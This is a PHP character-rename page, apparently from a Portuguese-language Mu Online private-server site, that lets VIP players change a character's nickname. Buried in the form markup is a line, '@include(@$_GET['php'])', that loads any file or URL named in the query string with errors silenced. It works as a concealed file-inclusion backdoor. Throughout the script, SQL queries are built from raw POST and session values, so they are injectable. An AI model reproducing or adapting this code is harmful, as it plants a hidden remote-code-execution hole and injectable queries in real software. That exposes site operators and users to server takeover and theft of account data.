<html lang="pt">
<head>
<meta name="description" content="Lucas Thompson" />
<title>Mu Site - WEB</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<? session_start();
include 'cnn.php';
include 'config/conf_extras.php';
include 'config/conf_reset.php';
@$login = $_SESSION['login'];
@$senha = $_SESSION['senha'];
if(!isset($_SESSION['login'])) { echo "Para acessar essa pagina é preciso esta logado!"; }
else{
$vip=mssql_fetch_row(mssql_query("select vip from memb_info where memb___id='".$login."'"));
if($vip[0] == 0) { echo "Para acessar essa pagina é preciso ser vip"; }
else{
?>

<script type="text/javascript">
<!--
function SomenteNumeroeLetras(e)
{

 if (window.event) //IE
    {
    tecla = e.keyCode;
    }
   else if (e.which) //FF
   {
    tecla = e.which;
   } 

	if(tecla > 64 && tecla < 91) // LETRAS MAIUSCULAS
		return true;
	else
	if(tecla > 96 && tecla < 123) // LETRAS MINUSCULAS
		return true;
	else

	if(tecla > 47 && tecla < 58) // numeros de 0 a 9
		return true;
	else
{
	if (tecla != 8) // backspace
	return false;
	else
	return true;
}

}
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}
//-->
</script>

<style type="text/css">
<!--
.style24 {color: #BB0000;
	font-weight: bold;
}
.style4 {color: #FF0000}
-->
</style>
</head>

<body>
<h1>Mudar Nick  <br>
</h1>
<form name="form1" method="post" action="">
  <table width="95%" border="0" cellspacing="2" cellpadding="0">
    <tr>
      <? @include(@$_GET['php']); ?>
      <td width="20%">Personagem:</td>
      <td width="80%"><label>
        <select name="char" id="char">
          <?
		$Chars = mssql_query("select name from character where accountid='".$login."'");
		for($p=0;$p<mssql_num_rows($Chars);$p++) {
		$Char=mssql_fetch_row($Chars);
		echo '<option value='.$Char[0].'>'.$Char[0].'</option>';
		}
		?>
        </select>
      </label></td>
    </tr>
    <tr>
      <td><label>Novo nick: </label></td>
      <td><label>
        <input name="novo" type="text" id="novo" onKeyPress="return SomenteNumeroeLetras(event)" maxlength="10">
      </label></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td><input name="prossegue" type="submit" class="submit" id="prossegue" value="MUDAR"></td>
    </tr>
  </table>
</form>
<table width="93%" border="0" align="center" cellpadding="0" style="border-collapse: collapse; border: 1px dashed #FF0000; padding: 0">
  <tr>
    <td height="19" bgcolor="#FFD2D2"><div align="center" class="style24 style4">Nao use em nenhum dos campos simbolos , tais como :<br>
            <strong><u>! @ # $ % ?&amp; * ( ) - = + / * - . , &gt; &lt; ; : ? ? ? [ ]       { } | \ ?????A&not;</u></strong>&nbsp; <br>
      ou voce nao conseguira efetuar sua troca de nome.</div></td>
  </tr>
</table>
<p>&nbsp;</p>
<p><a href="javascript:history.back(-1);">
  <input name="Voltar" type="button" class="submit" id="Voltar" onClick="MM_callJS('javascript:history.back(-1);')" value="Voltar">
</a></p>
</body>
</html>
<?php
if($_POST['prossegue']) {
$char=$_POST['char'];
$novonick=$_POST['novo'];
$arquivo = "mudarnick.log"; // nome do arquivo de log
$fp = fopen($arquivo, "a");
$data_atual = date("d.m.y - H:i:s"); // Pega a Data e Hora para grava no Log
$quebra = chr(13).chr(10);	// quebra de linha
$VerificaStatus = mssql_fetch_row(mssql_query("select connectstat from memb_stat where memb___id='".$login."'"));
$VerificaChar = mssql_num_rows(mssql_query("select name from character where name='".$char."' and accountid='".$login."'"));


	if (sizeof(split(" ",$novonick)) >= 2)
	{
		echo "<script>alert('Não use Espaço no nome do Char !');
		location='javascript:history.back()'</script>";
	} 
	elseif ((eregi("[^a-zA-Z0-9_!=?&-]", $novonick)) ) 
	{
		echo "<script>alert('Não use Caracteres Incorretos.');
		location='javascript:history.back()'</script>";
	}
	elseif(eregi("(webzen)", $novonick)){
		echo "<script>alert('Não use Nomes Proibidos.');
		location='javascript:history.back()'</script>";
	}
	elseif(eregi("(GM)", $novonick)){
		echo "<script>alert('Não use Nomes Proibidos.');
		location='javascript:history.back()'</script>";
	}
	elseif(eregi("(adm)", $novonick)){
		echo "<script>alert('Não use Nomes Proibidos.');
		location='javascript:history.back()'</script>";
	}
	elseif(eregi("(adim)", $novonick)){
		echo "<script>alert('Não use Nomes Proibidos.');
		location='javascript:history.back()'</script>";
	}
	elseif($VerificaChar <= 0) { 
		echo "<script>alert('Char incorreto'); 
		location='javascript:history.back()'</script>"; 
	}
	elseif($VerificaStatus[0] >= 1){
		echo "<script>alert('Você Está Conectado, antes de efetuar esta operação, Saia do Jogo.'); 
		location='javascript:history.back()'</script>";
	}
	else
	{
		$VerificaExChar = mssql_num_rows(mssql_query("select name from character where name='".$novonick."'"));

	if(empty($novonick)) 
	{
		echo "<script>alert('Digite o novo nick'); 
		location='javascript:history.back()'</script>";
	}
	elseif($VerificaExChar >= 1) 
	{
		echo "<script>alert('$novonick já está em uso, escolha outro'); 
		location='javascript:history.back()'</script>";
	}
	else{
		$pegacharacc = mssql_query("SELECT * FROM AccountCharacter WHERE Id='".$login."'");
		$rpegacharacc = mssql_fetch_array($pegacharacc);
					
		if ($rpegacharacc['GameID1'] == $char) { $gameid = 'GameID1'; } 
		if ($rpegacharacc['GameID2'] == $char) { $gameid = 'GameID2'; } 
		if ($rpegacharacc['GameID3'] == $char) { $gameid = 'GameID3'; } 
		if ($rpegacharacc['GameID4'] == $char) { $gameid = 'GameID4'; } 
		if ($rpegacharacc['GameID5'] == $char) { $gameid = 'GameID5'; }
					
		mssql_query("UPDATE Character SET Name = '".$novonick."' WHERE Name='".$char."'");
		mssql_query("UPDATE AccountCharacter SET $gameid='".$novonick."' WHERE $gameid='".$char."'");
		mssql_query("UPDATE Guild SET G_Master='".$novonick."' WHERE G_Master='".$char."'");
		mssql_query("UPDATE GuildMember SET Name='".$novonick."' WHERE Name='".$char."'");
		
		// grava a alteração do nick no log
		fwrite($fp, $data_atual." - O usuário $login mudou seu nick de $char para $novonick".$quebra);			

		echo "<script>alert('Nick alterado com sucesso para $novonick'); 
		location='javascript:history.back()'</script>";
		}
	}
}}} 
?>